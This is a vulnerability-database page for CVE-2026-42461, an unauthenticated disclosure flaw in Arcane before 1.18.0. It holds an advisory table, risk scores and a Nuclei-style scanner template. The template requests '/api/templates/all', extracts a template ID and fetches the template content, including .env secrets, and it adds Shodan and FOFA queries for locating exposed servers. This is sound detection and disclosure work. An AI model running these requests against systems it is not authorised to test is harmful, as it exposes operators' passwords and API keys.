Arcane < 1.18.0 - Unauthenticated Template and Env Disclosure
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CVE-2026-42461 | 9 May 202603:30 | – | attackerkb | |
| CVE-2026-42461 | 9 May 202605:12 | – | circl | |
| arcane 安全漏洞 | 9 May 202600:00 | – | cnnvd | |
| CVE-2026-42461 | 9 May 202603:30 | – | cve | |
| CVE-2026-42461 Arcane Vulnerable to Unauthenticated Disclosure of Custom Compose Template Content (incl. `.env` secrets) | 9 May 202603:30 | – | cvelist | |
| EUVD-2026-28897 | 9 May 202603:30 | – | euvd | |
| Arcane Vulnerable to Unauthenticated Disclosure of Custom Compose Template Content (incl. `.env` secrets) | 30 Apr 202620:55 | – | github | |
| CVE-2026-42461 | 9 May 202604:16 | – | nvd | |
| GHSA-CXX3-HR75-4Q96 Arcane Vulnerable to Unauthenticated Disclosure of Custom Compose Template Content (incl. `.env` secrets) | 30 Apr 202620:55 | – | osv | |
| GO-2026-5340 Arcane Vulnerable to Unauthenticated Disclosure of Custom Compose Template Content (incl. `.env` secrets) in github.com/getarcaneapp/arcane/backend | 25 Jun 202618:43 | – | osv |
10
id: CVE-2026-42461
info:
name: Arcane < 1.18.0 - Unauthenticated Template and Env Disclosure
author: str4k3r
severity: high
description: |
Arcane < 1.18.0 contains an information disclosure caused by missing authorization on /api/templates GET endpoints, letting unauthenticated network clients read sensitive Compose YAML and .env content, exploit requires network access
impact: |
Unauthenticated attackers can read sensitive operator secrets like database passwords and API keys, risking full system compromise.
remediation: |
Update to version 1.18.0 or later.
reference:
- https://github.com/getarcaneapp/arcane/security/advisories/GHSA-cxx3-hr75-4q96
- https://nvd.nist.gov/vuln/detail/CVE-2026-42461
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-42461
cwe-id: CWE-306
metadata:
verified: true
max-request: 2
vendor: getarcaneapp
product: arcane
shodan-query: html:"/api/app-images"
fofa-query: body="/api/app-images"
tags: cve,cve2026,arcane,exposure
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "/api/app-images")'
condition: and
internal: true
- raw:
- |
GET /api/templates/all HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "BaseApiResponseListTemplate")'
condition: and
internal: true
extractors:
- type: regex
name: tid
part: body
group: 1
internal: true
regex:
- '"id"\s*:\s*"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"'
- raw:
- |
GET /api/templates/{{tid}}/content HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "envContent")'
condition: and
# digest: 4b0a0048304602210098fd3e7d2afd16ce78fbc06020c431935b938c115b58cf03754dfad35583b91c022100aeb476496c7c6becef2e4d135f90adac4f6723cd27c10830c3cca48115188d08:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Aug 2026 20:11Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.17.5
CVSS 48.7
EPSS0.0031
SSVC